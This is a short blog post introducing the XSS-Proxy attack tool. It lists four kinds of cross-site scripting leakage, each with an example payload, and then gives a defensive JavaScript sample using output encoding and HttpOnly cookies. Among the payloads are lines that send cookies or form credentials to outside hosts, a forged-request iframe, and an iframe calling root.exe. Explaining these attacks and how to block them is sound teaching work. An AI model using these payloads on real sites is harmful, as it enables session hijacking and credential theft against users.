Cross Site Scripting Attack Tool
By admin on Oct 27, 2009 in hacking, open source
XSS-Proxy is an advanced Cross-Site-Scripting (XSS) attack tool.
Types of information leakage due to an XSS attack
1. Client can reveal cookies to 3rd party (session state, order info, etc)
http://host/a.php?variable="><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?'%20+document.cookie</script>
2. Client can reveal posted form items to 3rd party (userID/passwd, etc)
<form action="logoninformation.jsp" method="post" onsubmit="hackImg=new Image; hackImg.src='http://www.malicioussite.com/'+document.forms(1).login.value+':'+document.forms(1).password.value;"></form>
3. Client can be tricked into accessing/posting spoofed info to trusted server
http://www.trustedserver.com/xss.asp?name = <iframe
src=http://www.trustedserver.com/auth_area/orderupdate?items=4000></iframe>
4. Client can be tricked into attacking other sites
/hello.asp?name = <iframe
src=http://vuln.iis.server/scripts/root.exe?/c+dir></iframe>
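All four cases above depend on a page reflecting a request parameter into HTML without encoding it. As an added example (not part of the original post or of XSS-Proxy; the function names are hypothetical and the inputs are constructed from the list items), here is the unencoded reflection beside its encoded form, with a session cookie marked HttpOnly so that the document.cookie read in case 1 returns nothing useful:

```javascript
// Added example: output encoding for a reflected parameter, plus an HttpOnly
// session cookie. All function names here are hypothetical.

// Escape the characters that let text break out of HTML text or a quoted attribute.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// "Before": the parameter is concatenated into the page as-is.
function renderVulnerable(name) {
  return '<input name="variable" value="' + name + '"><p>Hello ' + name + '</p>';
}

// "After": same template, every reflection goes through escapeHtml().
function renderHardened(name) {
  const safe = escapeHtml(name);
  return '<input name="variable" value="' + safe + '"><p>Hello ' + safe + '</p>';
}

// Session cookie header that page script cannot read through document.cookie.
function sessionCookieHeader(sessionId) {
  return 'session=' + encodeURIComponent(sessionId) + '; HttpOnly; Secure; SameSite=Lax; Path=/';
}

// True if the rendered markup contains an opening tag the template did not author.
function hasInjectedTag(html) {
  const tags = html.match(/<\s*([a-z][a-z0-9]*)/gi) || [];
  return tags.some((t) => !/^<\s*(input|p)$/i.test(t));
}

// Constructed sample inputs modelled on items 1 and 3 of the list above.
const samples = [
  '"><script>document.location=\'http://www.cgisecurity.com/cgi-bin/cookie.cgi?\'+document.cookie</script>',
  '<iframe src=http://www.trustedserver.com/auth_area/orderupdate?items=4000></iframe>',
  'Alice',
];

for (const s of samples) {
  console.log(JSON.stringify(s.slice(0, 24)),
    'vulnerable:', hasInjectedTag(renderVulnerable(s)),
    'hardened:', hasInjectedTag(renderHardened(s)));
}
console.log(sessionCookieHeader('constructed-id-123'));
```

HttpOnly only addresses the cookie read in case 1; cases 2 to 4 are stopped by the encoding, since the injected markup is rendered as text.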